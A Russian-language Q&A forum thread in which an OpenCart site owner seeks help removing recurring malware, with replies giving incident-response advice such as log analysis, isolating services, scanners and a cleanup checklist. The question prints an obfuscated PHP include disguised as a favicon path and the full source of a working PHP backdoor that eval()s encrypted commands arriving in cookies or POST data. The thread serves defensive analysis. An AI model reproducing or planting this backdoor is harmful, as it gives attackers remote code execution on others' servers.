# Как удалить вредоносный код из сайта

Tags: php, безопасность, opencart, защита, вредоносный-код

Здравствуйте. Недавно начал замечать, что при открытии моего сайта идет редирект на какой то рекламный сайт. Начал смотреть свой код, в index.php нашел строку такого вида:

```
/*1d3ec*/

@include "\x2fhom\x65/ab\x6din/\x64oma\x69ns/\x68***\x61**\x65/pu\x62lic\x5fhtm\x6c/vq\x6dod/\x76qca\x63he/\x66avi\x63on_\x3786a\x34f.i\x63o";

/*1d3ec*/
```

когда убрал лишнее, получился путь к какому то файлу:

```
home/admin/domains/домен_сайта/public_html/vqmod/vqcache/favicon_786a4f.ico
```

Нашел этот файл, открываю его, а там:

[image: введите сюда описание изображения]

Ну ладно думаю, код удалил из index.php, файл тоже.. на следующий день появился новый код в этом же стиле и новый файл, только в другой папке. Как очистить сайт от этой заразы?

Движок: Опенкарт 2.1.0.1

Из модулей установлены только: Marketplace, Ajax Product Page Loader, [OCJazz] SeoPro, uLogin - панель.
Модификаторы: Local copy OCMOD by iSenseLabs, Easy Blog Simple for oc2011+.

Пароль к хостингу изменил, атрибуты для файла index.php сделал "только чтение", не помогло. Возможно кто то сталкивался с таким. Спасибо что дочитали до конца!

**UPD**: Вирус до сих пор остался, чистил уже много раз. Решил посмотреть что кроется внутри вредоносного кода, прошу помощи тех кто сможет понять где дыра из кода ниже, так как сам знаком с PHP не более года.

```
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);


if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

$data = NULL;
$data_key = NULL;

$GLOBALS['cs_auth'] = 'aad641a4-4dd3-47a3-981c-7dfb1725ccd9';
global $cs_auth;


if (!function_exists('file_put_contents'))
{
    function file_put_contents($n, $d, $flag = False)
    {
        $mode = $flag == 8 ? 'a' : 'w';
        $f = @fopen($n, $mode);
        if ($f === False)
        {
            return 0;
        }
        else
        {
            if (is_array($d)) $d = implode($d);
            $bytes_written = fwrite($f, $d);
            fclose($f);
            return $bytes_written;
        }
    }
}

if (!function_exists('file_get_contents'))
{
    function file_get_contents($filename)
    {
        $fhandle = fopen($filename, "r");
        $fcontents = fread($fhandle, filesize($filename));
        fclose($fhandle);

        return $fcontents;
    }
}
function cs_get_current_filepath()
{
    return trim(preg_replace("/\(.*\$/", '', __FILE__));
}

function cs_decrypt_phase($data, $key)
{
    $out_data = "";

    for ($i=0; $i<strlen($data);)
    {
        for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
        {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }

    return $out_data;
}

function cs_decrypt($data, $key)
{
    global $cs_auth;

    return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
function cs_encrypt($data, $key)
{
    global $cs_auth;

    return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}

function cs_get_plugin_config()
{
    $self_content = @file_get_contents(cs_get_current_filepath());

    $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
    if ($config_pos !== FALSE)
    {
        $config = substr($self_content, $config_pos + 32);
        $plugins = @unserialize(cs_decrypt(base64_decode($config), md5(cs_get_current_filepath())));
    }
    else
    {
        $plugins = Array();
    }

    return $plugins;
}

function cs_set_plugin_config($plugins)
{
    $config_enc = base64_encode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
    $self_content = @file_get_contents(cs_get_current_filepath());

    $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
    if ($config_pos !== FALSE)
    {
        $config_old = substr($self_content, $config_pos + 32);
        $self_content = str_replace($config_old, $config_enc, $self_content);

    }
    else
    {
        $self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
    }

    @file_put_contents(cs_get_current_filepath(), $self_content);
}

function cs_plugin_add($name, $base64_data)
{
    $plugins = cs_get_plugin_config();

    $plugins[$name] = base64_decode($base64_data);

    cs_set_plugin_config($plugins);
}

function cs_plugin_rem($name)
{
    $plugins = cs_get_plugin_config();

    unset($plugins[$name]);

    cs_set_plugin_config($plugins);
}

function cs_plugin_load($name=NULL)
{
    foreach (cs_get_plugin_config() as $pname=>$pcontent)
    {
        if ($name)
        {
            if (strcmp($name, $pname) == 0)
            {
                eval($pcontent);
                break;
            }
        }
        else
        {
            eval($pcontent);
        }
    }
}

foreach ($_COOKIE as $key=>$value)
{
    $data = $value;
    $data_key = $key;
}

if (!$data)
{
    foreach ($_POST as $key=>$value)
    {
        $data = $value;
        $data_key = $key;
    }
}

$data = @unserialize(cs_decrypt(base64_decode($data), $data_key));

if (isset($data['ak']) && $cs_auth==$data['ak'])
{
    if ($data['a'] == 'i')
    {
        $i = Array(
            'pv' => @phpversion(),
            'sv' => '2.0-1',
            'ak' => $data['ak'],
        );
        echo @serialize($i);
        exit;
    }
    elseif ($data['a'] == 'e')
    {
        eval($data['d']);
    }
    elseif ($data['a'] == 'plugin')
    {
        if($data['sa'] == 'add')
        {
            cs_plugin_add($data['p'], $data['d']);
        }
        elseif($data['sa'] == 'rem')
        {
            cs_plugin_rem($data['p']);
        }
    }
    echo $data['ak'];

}

cs_plugin_load();
}
```

**UPD 2:**
Посмотрел только что логи по одному из сайтов и вот что там

[image: введите сюда описание изображения]

Comment: модули установленные - лицензионные с офф. сайта?

Comment: @Abmin рекомендую менять хост. на личном опыте. Вы случайно не "ocStore-русская зборка" пользуете?

Comment: @KirillKorushkin, нет, не osStore. Не думаю что виноват хост, не первый год там, такое впервые. Читал об этом ocStore, то у меня вредоносный код не в тех файлах что у людей.

Comment: @AntonBogomolov, не помню, так как давно уже ставил. Ещё в 2015 году. А вредоносный код только 2 недели назад появился.

Comment: @Abmin очевидно, что дырка в опенкарте или модулях. Есть бэкапы - откатите код (или сравните). Обновите опенкарт и модули. Не поможет - удаляйте модули по одному. Не поможет - скорее всего дырка в опенкарте.

Нет возможности откатить код или удалять модули - ставьте чистый опенкарт и переносите сайт на него (в идеале на чистый хостинг).

Comment: 1. Смотрите по логам, "кто" меняет файлы. 2. Меняйте пароли FTP/SFTP/SSH на сложные. 3. Какими клиентами пользуютесь для редактирования сайта? Возможно через них пароли утекли. Или через конфиг какой... 4. Вообще логи, логи, и еще раз логи смотрите ;) 5. Нет доступа к логам - трясите хостинг-компанию. Хостинг-компания не желает помогать в решении проблемы - меняйте ее.

Comment: @AlexanderBragin, пароли ставлю сложные, ничего не даёт. Редактор - Notepad ++, FTP клиент - FileZilla. Хостинг говорит что это может быть из за установки разных плагинов/компонентов взятых с пиратских сайтов.

Comment: @Abmin есть вероятность, что пароль «уходит» через FileZilla или Notepad++. Я давно с чем-то подобным сталкивался. На тех компьютерах, где они установлены и пароль к сайту прописан — стоит какой-нибудь антивирус, какой? Но пока это всё догадки — логи более точно скажут. | «Хостинг говорит что это может быть...» у хостинга есть доступ к логам, поэтому «может быть...» звучит по дилетантски» с их стороны. Это мы, сейчас в сообществе догадки можем делать, так как данных маловато и доступа ни к чему нету...

Comment: @Abmin вообщем первое, что сделайте установите хороший антивирус (Касперский, если ещё не установлен, путь даже и полноценную дему на 30 дней) где стоят программы где вы пароли добавили и проверьте полностью компьютер. Большой % что троянов найдет. Avast и подобные — увы... Вот еще на тему [Безопасность паролей в Filezilla](http://filezilla.ru/article/bezopasnost-parolej-v-filezilla). Вот таким образом могут «уплывать» данные. И тот про пишет трояны — знаю об этой «уязвимости». Даже, если вы придумаете мега большой и сложный пароль — толку от него не будет, так как он в открытом виде хранится.

Comment: @AlexanderBragin, установил Касперский по вашему совету, но он ничего не нашел. Когда вирус создает файлы, их владельцем есть я. Я обновил вопрос, может это поможет найти ответ на него! Спасибо за помощь

Comment: @Abmin _Когда вирус создает файлы, их владельцем есть я._ — вы это по логам смотрите? То есть изменения имеете виду происходит посредством FTP от имено пользователя этого FTP к которому создан пароль? А IP, IP самое главное какой? Локальный где сайт работает, IP вашего компьютера или вообще какой-то левый.

Comment: @Abmin после того как установили антивирус и сделали полную проверку — нужно поменять FTP и проследить за изменениями снова. Очистив файлы от скрипта. И ждать, смотреть на логи: через что, когда и с какого IP изменения файлов происходят. FTP больше нигде не прописаны, кроме вашего компьютера?

Comment: @AlexanderBragin, нет, доступ только у меня прописан. В логах ничего нет, а в FTP там где вкладка владелец пишут те самые цифры что и у остальных файлов, то есть владелец я.

Comment: У меня виртуальный Windows-сервер в облаке с IIS. Проблемы начались с сайтами на WordPress, затем досталось и OpenCart. Зараза периодически добавляла себя в файлы движка. Оказалось что дело не столько в настройках прав доступа к папкам сайта, сколько в работе пула приложения, который изначально работал с правами администратора. Это и позволяло заразе получать доступ к закрытым, казалось бы, от чужих папкам. Надо менять права исполняемому процессу, т.е. все вопросы к провайдеру. Зараза же активировалась после прохождения поисковика по зараженной странице, т.е. просто запускался код на ней.

Comment: Opencart  2.1.0.1 сам по себе дырявый, чистите вашу версию (я обычно пользуюсь [ai-bolit](https://revisium.com/ai/)), и обновляйтесь как можно скорее. Проблема в движке. Для вашей версии есть например вот такой exploit: https://www.exploit-db.com/exploits/39679/

Comment: @ПавелАзанов, спасибо за помощь, но поймите, проблема не только в опенкарте, вирус распространяется на все сайты, не важно, опенкарт это или джумла или даже рукописный. Я вон не могу до конца понять что делает этот вирусный код и как.

Comment: Если у вас несколько сайтов на одной учетке, зараза может входить через любой из них. И это так практически на любом виртуальном хостинге. Вам нужен опытный человек, который сможет посвятить этой проблеме время. Тут вы не найдете готовых рецептов

Comment: Если очень хочется разобраться самостоятельно - разнесите сайты по нескольким учеткам и пытайтесь их вычистить

Comment: @tutankhamun, сайтов несколько на хостинге, и все заражены этой дрянью, но я знаю от какого сайта всё это пошло! Я не ищу готовый рецепт, а хотя бы зацепку, чтобы уже самому искать дыру.

Comment: Как нашли "виновника"? Вы уверены что угроза идет оттуда? Изолируйте его, Хоть остальные будут нормально работать пока будете разбираться

Comment: @tutankhamun, у меня было 3 сайта, один из них самописный, только html файлы, и два на опенкарте. Когда увидел вирус, один сайт на опенкарте полностью удалил, почистил все, вирус остался. Позже еще на джумле один сайт сделал, вирус сейчас и на него залез. Сложно понять остался вирус или нет, он может неделю не появляться а потом раз и есть. То есть чтобы понять что вируса нет нужно долго наблюдать.

Comment: @Abmin если идет распространение на все сайты, то скорее всего неверно настроены права доступа. Каждый сайт должен быть изолирован

Comment: @ПавелАзанов, а что мне с изоляции? мне нужно вылечить сайт и понять где дыра

Comment: Мне помогла утилита AIBolit почистить выделенный веб-сервер с ~50ю сайтами на нем

Comment: @Abmin вам хостер так и отказываются помогать? А не на хостинге ли самом вирус? ;)

Comment: @AlexanderBragin, с хостером говорил, вот их ответ: Судя по логам FTP и файлового менеджера панели, код проникает на сервер не через FTP и не через файловый менеджер. stat одного из файлов говорит что он был создан 25 апреля, но если он появился только день или два назад, то очевидно, что он был скопирован из другого места, а это означает, что где-то в глубине Вашего аккаунта на каком-то из сайтов спрятан троян, к которому есть открытый доступ из web. Можно также проанализировать логи с обращениями к вашему сайту

Comment: @Abmin а какие права и пользователь прописаны у зараженных файлов? Например, __-rwxr-xr-x 1 root root 49940 Sep 12 1999 /bin/ls__ Веб-сервер NGINX/Apache?

Comment: @Abmin цитирую от сюда https://www.drupal.org/node/244924: _Файловая система сервера должна быть настроена так, чтобы веб-сервер (например, Apache) не имел права редактировать или записывать файлы, которые он затем выполняет. То есть все ваши файлы должны быть «только для чтения» для процесса Apache и иметь права на запись отдельным пользователем._

Comment: @Abmin вот статья по безопасности PHP вроде хорошая — https://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html

Comment: Первой командой в index.php или config.php (смотря где код вредоносный прописан) поставьте `define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);` чтобы код не выполнялся.

Comment: А теперь, когда есть лог, смотрите все обращения с этого адреса. Можно начать распутывать клубок.

Comment: Можно сделать деобфускацию кода и узнать информацию о злоумышленнике. Я когда-то делал - помогло. (к примеру: https://habrahabr.ru/post/137459/)

Answer (score 13, accepted):

Начнем с простых истин. Вирус - это какая-то программа, которая где-то находится и делает что-то такое, что приводит к ее размножению.

Каким-то образом вирус попадает к вам на сервер. Это может быть дырка в используемом софте на сервере (и далеко не факт, что виноват Опенкарт, тем более, совершенно не важно, лицензионные копии ли там используются), софте хостера, вашем хосте, откуда вы управляете сайтом. И используя эту дырку, вредоносный код получает доступ туда, куда по идее, иметь доступ не должен.

И, получив доступ, вирус, как правило, размножается дальше. Ему не важно, где и с какими лицензиями вы работаете, сколько сайтов хостите и т.д., он будет рассеивать себя везде, куда сможет дотянуться. Поэтому если у вас только 1 дырявый файлик, то под угрозой все, что есть на сервере вместе взятое.

**Как быть:** починить последствия, сделать бекап, если часто повторяется - накатывать бекап автоматически, хоть каждый час. В деле поиска измененных файлов хорошую помощь сыграют утилиты `find`, `grep`, `mc`. Но это не лечение болезни, а лечение симптома.

**Как ловить:** для начала попробовать локализовать проблему. Выключить на сайте все, кроме, скажем, веб-сервера. Т.е. если есть ФТП-сервер - затушить его так, что даже вы не сможете войти, аналогично с почтой, ssh, прочими сервисами, что слушают не 127.0.0.1. Если чудеса продолжаются - тушим веб-сервер (сайт будет лежать), но включаем FTP и все остальное и снова ждем чудес. Если и после этого чудеса продолжаются, то скорее всего виноват или кривой хостер, или у вас комплексная проблема.

Обнаружив источник проблемы, пытаемся локализовать проблему более точно. Если чудеса при включенном веб-сервере, то настраиваем веб-сервер на ведение подробнейших логов и пишем их куда-то в нестандартное место, а лучше сразу сливать на удаленный хост. Когда начнутся чудеса, то смотреть логи, где-то там будет что-то интересное и необычное. Вот это необычное и есть дырка.

Если дырка за пределами веб-сервера, то можно попробовать использовать тяжелую артилерию вроде `tcpdump`, рано или поздно животинка попадется. Тут главное запастись большим объемом диска. Если и тут животинка не попадется, то вас имеет хостер, ну или где-то на предыдущих пунктах она прошла незамеченной.

А найдя дырку, уже известно что исправлять/обновлять и никакого гадания на открытой гуще. Как правило, хорошим тоном будет сообщить авторам о дырке в их софте, они это постараются починить (если авторы являются нашими соотечественниками, то кроме хамства и угроз в ответ ничего не получите) в кратчайшие сроки и выслать вам исправленную версию.

Конечно, такое сафари плохо совместимо с нормальной работой сайта, но это весело и даст результат.

Comment: спасибо за ответ, буду пробовать

Comment: Как с одним хостером бодался по похожему поводу около 2х месяцев. Понял, что бесполезно - сменил, доволен как слон - вирусы сразу как рукой сняло.

Comment: Хостеры с кривыми руками не редкость, но может быть и другая причина исцеления: сервер переехал в новый диапазон адресов, который малварь еще не знает и пока не пытается сканировать. Потому в один прекрасный день может все вернуться. Именно потому надо искать дырку самостоятельно, а не менять хостеров как перчатки.

Answer (score 5):

Вообще, причиной всего этого является 100% не этот найденный вами файл. С подобными скриптами сталкивался не раз, но на Wordpress (отчего его и недолюбливаю). Суть там примерно такая - один раз находится дырка в вашем сайте (скорее всего просто подобрали ftp пароль), затем заливается обычный файл, предоставляющий доступ к редактированию файлов (есть какой-то легковесный редактор файлов, там буквально 40-50 строчек, даже пароля не просит), а затем уже все "грязные" скрипты заливаются через него, так что искать вам надо именно такой файл. Открывать AccessLog и смотреть к каким файлам обращаются. Антивирусы хостингов (тем более Касперского, т.к. он не ориентирован на php) этот файл не распознают как вирусный, т.к. он вполне логичен - т.к. там никаких кракозябр, preg_replace и прочего.

Comment: Я понимаю что не этот файл, думал может если этот код использует $_GLOBALS, то можно каким то образом запретить его использовать. Мне хотя бы наводку, какой примерно код может быть дыркой, чтобы я искал его. Просто искать среди 1000+ файлов не зная что это абсурд. На сколько я понял, этот вирус не записывает в логи то что делает, или потом чистит их. Сайт я знаю какой дырявый, это уже плюс. Осталось найти дыру.

Comment: В том-то и дело, что дыра может быть уже "залатана", но этот скрипт успел насоздавать в остальных сайтах, где-нибудь в закромах, небольшие файлы, позволяющие заливать\редактировать файлы и уже работает через него. Поэтому искать следует скрипты, в которых содержатся какие-либо функции работы с файлами.

Answer (score 5):

Думаю, первое, что нужно сделать на время ремонта - это просканировать сканером уязвимости, хотя бы тулзой Nikto.

https://www.youtube.com/watch?v=U9FQlZDtPV4

Далее сменить все ключи, абсолютно все управляющие ключи. Написать хостеру о проблеме если хостинг, если VDS просканировань систему и понять насколько все плохо. Если руткит или червь, менять сервер. В этом помогут логи, и команды `grep`,`find` и `top`.

После переезда и закрытия сайта начать чистить код, в идеале сделать образ и снимок состояния, провести скан уязвимостей, портировать образ на локаль и попробовать вытащить данные, после чистки закрыть уязвимость которую выдал CVE. Все это нужно сделать обязательно. Так как у вас простая проблема, вы **чистите вирус**, но не **закрываете уязвимость**. После того, как вы проделаете все это, советую поставить IDS/IPS. Самая известная: 
https://www.mcafee.com/ru/products/network-security-platform.aspx.

Эта система позволит вам отследить, сделал ли это инсайдер.
Так же советую регулярно делать обновления систем. Если система свежая, то советую написать об уязвимости её авторам.

Comment: Что такое "портировать образ на локаль"? Алсо, я бы советовал помедленней и не так активно действовать, можно сломать вирус и он больше не будет давать о себе знать, а следовательно дырку уже никогда не найдете. И тогда, на смену одному зверю, может придти другой.

Comment: спасибо за ответ, буду пробовать

Answer (score 4):

Пока лучшая, на мой взгляд, статья по лечению на хабре https://habrahabr.ru/post/188878/

С вероятностью 90% это заражение на уровне эксплуатации известных дырок в CMS. Если CMS позволяет то лучше "экспорт всего" -> "новая установка cms со всеми патчами безопасности" -> "импорт всего". Но к сожалению такое редко возможно.

Обычно я делаю так:

1. Получение ssh доступа
2. Смена всех остальных доступов (и временный бан всех привелигированых пользователей)
3. Бекап логов и утягивание их к себе для анализа
4. Весь сайт бекапим (обязательно что бы сохранялись даты и права) и желательно запихиваем в GIT
5. Поиск shell сканерами и антивирусами в автоматическом режиме (только список shell или зараженных файлов)
6. Поиск подозреваемых на shell по статье на хабре (только список)
7. Поиск менявшихся файлов по дате, по логам (get запросы к shell остаются - надо искать по доступу к ним и по ip туда ходившим)
8. Поиск различий между чистой CMS (давними копиями) и текущей версией
9. Поиск точки заражения (к этому времени у нас полно информации и сделать это проще)
10. Чистка с проверкой и фиксацией в GIT (или да же замена ядра CMS на не зараженное)
11. Исправление уязвимости (обновлением CMS или bug fix)
12. Правильная настройка логирования, прав на файлы и папки, бекапы, обновление ПО (если vps или железка), настройка автоматического сканера или антивируса.
13. Смена всех доступов.
14. Наблюдение за пациентом в течении некоторого времени (за 1 раз могли не все вычистить, или не было логов или не все нашли).

Comment: спасибо за ответ, буду пробовать бороться